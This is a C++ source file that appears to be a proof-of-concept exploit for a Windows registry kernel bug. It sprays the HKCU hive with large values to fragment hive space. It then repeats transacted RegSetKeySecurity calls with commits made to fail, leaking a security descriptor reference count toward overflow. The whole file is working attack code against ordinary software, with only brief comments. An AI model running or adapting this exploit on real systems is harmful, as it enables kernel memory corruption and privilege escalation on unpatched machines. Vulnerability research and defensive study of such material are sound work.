#define WIN32_NO_STATUS
#include <Windows.h>
#undef WIN32_NO_STATUS
#include <winternl.h>
#include <ktmw32.h>
#include <ntstatus.h>
#include <sddl.h>

#include <cstdio>

#pragma comment(lib, "ntdll.lib")

extern "C" {

NTSTATUS NTAPI NtCreateRegistryTransaction(PHANDLE, DWORD, POBJECT_ATTRIBUTES, DWORD);
NTSTATUS NTAPI NtCommitRegistryTransaction(HANDLE, DWORD);

}  // extern "C"

int main() {
  LSTATUS st;

  //
  // Create the test key under HKCU with a custom security descriptor.
  //

  SECURITY_ATTRIBUTES sa;
  sa.nLength = sizeof(SECURITY_ATTRIBUTES);
  sa.bInheritHandle = FALSE;

  CONST WCHAR* szSD = L"D:(A;;KA;;;WD)"; // Allow KEY_ALL_ACCESS for Everyone.

  if (!ConvertStringSecurityDescriptorToSecurityDescriptorW(
          szSD, SDDL_REVISION_1, &sa.lpSecurityDescriptor, NULL)) {
    printf("ConvertStringSecurityDescriptorToSecurityDescriptorW failed with "
           "error %u\n", GetLastError());
    return 1;
  }

  HKEY hTestKey;
  st = RegCreateKeyExA(HKEY_CURRENT_USER,
                       "Test",
                       0,
                       NULL,
                       REG_OPTION_VOLATILE,
                       KEY_ALL_ACCESS,
                       &sa,
                       &hTestKey,
                       NULL);

  if (st != ERROR_SUCCESS) {
    printf("RegCreateKeyExA failed with error %d\n", st);
    return 1;
  }

  //
  // Pre-create the value nodes to minimize fragmentation of cells during
  // spraying, and to arrive at a stable key value index that won't be
  // reallocated later.
  //

  CONST ULONG kSprayValues = 0x4000;

  printf("Pre-creating registry spray values...\n");

  for (ULONG i = 0; i < kSprayValues; i++) {
    CHAR chValueName[10];
    _snprintf_s(chValueName, sizeof(chValueName), "%.8x", i);
    
    st = RegSetValueExA(hTestKey,
                        chValueName,
                        0,
                        REG_BINARY,
                        (const BYTE*)"AAAA",
                        4);

    if (st != ERROR_SUCCESS) {
      printf("RegSetValueExA failed with error %d\n", st);
      return 1;
    }
  }

  //
  // Allocate space in the hive by creating values of descending length, up
  // to the point where there is no room left in the hive for new allocations.
  //

  CONST ULONG kMaxValueSize = 512 * 1024 * 1024;  // 512 MiB
  PBYTE chValueData = (PBYTE)malloc(kMaxValueSize);

  if (chValueData == NULL) {
    printf("malloc(%u) failed\n", kMaxValueSize);
    return 1;
  }

  memset(chValueData, 0xCC, kMaxValueSize);

  printf("Spraying registry with size %u...\n", kMaxValueSize);

  ULONG ulSprayAllocSize = kMaxValueSize, ulTotalSpraySize = 0;
  for (ULONG i = 0; ulSprayAllocSize > 4; i++) {
    CHAR chValueName[10];
    _snprintf_s(chValueName, sizeof(chValueName), "%.8x", i);

    st = RegSetValueExA(hTestKey,
                        chValueName,
                        0,
                        REG_BINARY,
                        chValueData,
                        ulSprayAllocSize - 4);

    if (st == ERROR_SUCCESS) {
      ulTotalSpraySize += ulSprayAllocSize;
    } else {
      ulSprayAllocSize /= 2;
      printf("Spraying registry with size %u...\n", ulSprayAllocSize);
    }
  }

  printf("Registry sprayed with a total of 0x%x bytes\n", ulTotalSpraySize);

  //
  // Clear the values, as they have already fulfilled their role of fragmenting
  // the hive space into small 16 KiB hbins.
  //

  for (ULONG i = 0; i < kSprayValues; i++) {
    CHAR chValueName[10];
    _snprintf_s(chValueName, sizeof(chValueName), "%.8x", i);

    st = RegSetValueExA(hTestKey,
                        chValueName,
                        0,
                        REG_BINARY,
                        (const BYTE *)"AAAA",
                        4);

    if (st != ERROR_SUCCESS) {
      printf("RegSetValueExA failed with error %d\n", st);
      return 1;
    }
  }

  //
  // Execute the refcount leaking logic.
  //

  ULONGLONG LastTickCount = GetTickCount64(), LastRefcount = 1;
  CONST ULONG kRefcountLeakBatchSize = 512;

  for (ULONGLONG Refcount = 1;
       Refcount < 0x100000000UL;
       Refcount += kRefcountLeakBatchSize) {

    //
    // Create a lightweight registry transaction.
    //

    HANDLE hTrans;
    NTSTATUS Status = NtCreateRegistryTransaction(&hTrans,
                                                  TRANSACTION_ALL_ACCESS,
                                                  NULL,
                                                  0);
    if (!NT_SUCCESS(Status)) {
      printf("NtCreateRegistryTransaction failed with error %.8x\n", Status);
      return 1;
    }

    //
    // Open HKCU\Test in the scope of a transaction.
    //

    HKEY hTransactedKey;

    st = RegOpenKeyTransactedA(HKEY_CURRENT_USER,
                               "Test",
                               0,
                               KEY_ALL_ACCESS,
                               &hTransactedKey,
                               hTrans,
                               NULL);

    if (st != ERROR_SUCCESS) {
      printf("RegOpenKeyTransactedA failed with error %d\n", st);
      return 1;
    }

    //
    // Set the key security transactionally N times in a row.
    //

    for (ULONGLONG i = 0; i < kRefcountLeakBatchSize; i++) {
      st = RegSetKeySecurity(hTransactedKey,
                             DACL_SECURITY_INFORMATION,
                             sa.lpSecurityDescriptor);

      if (st != ERROR_SUCCESS) {
        printf("RegSetKeySecurity failed with error %d\n", st);
        return 1;
      }
    }

    //
    // Transactionally set a very long value, which should fail during the
    // commit phase.
    //

    CONST DWORD kLargeValueLength = 1024 * 1024;  // 1 MiB

    st = RegSetValueExA(hTransactedKey,
                        "00000000",
                        0,
                        REG_BINARY,
                        chValueData,
                        kLargeValueLength);

    if (st != ERROR_SUCCESS) {
      printf("RegSetValueExA failed with error %d\n", st);
      return 1;
    }

    //
    // Try to commit the transaction, thus triggering the bug.
    //

    Status = NtCommitRegistryTransaction(hTrans, 0);
    if (Status != STATUS_INSUFFICIENT_RESOURCES) {
      printf("NtCommitRegistryTransaction failed with error %.8x "
             "(expected STATUS_INSUFFICIENT_RESOURCES)\n", Status);
      return 1;
    } 

    //
    // Cleanup.
    //

    RegCloseKey(hTransactedKey);
    CloseHandle(hTrans);

    //
    // Debug output.
    //

    if (GetTickCount64() - LastTickCount > 1000) {
      printf("Refcount: %.8llx (%llu / s)\n",
             Refcount,
             ((Refcount - LastRefcount) * 1000ULL) /
             (GetTickCount64() - LastTickCount));

      LastTickCount = GetTickCount64();
      LastRefcount = Refcount;
    }
  }

  return 0;
}
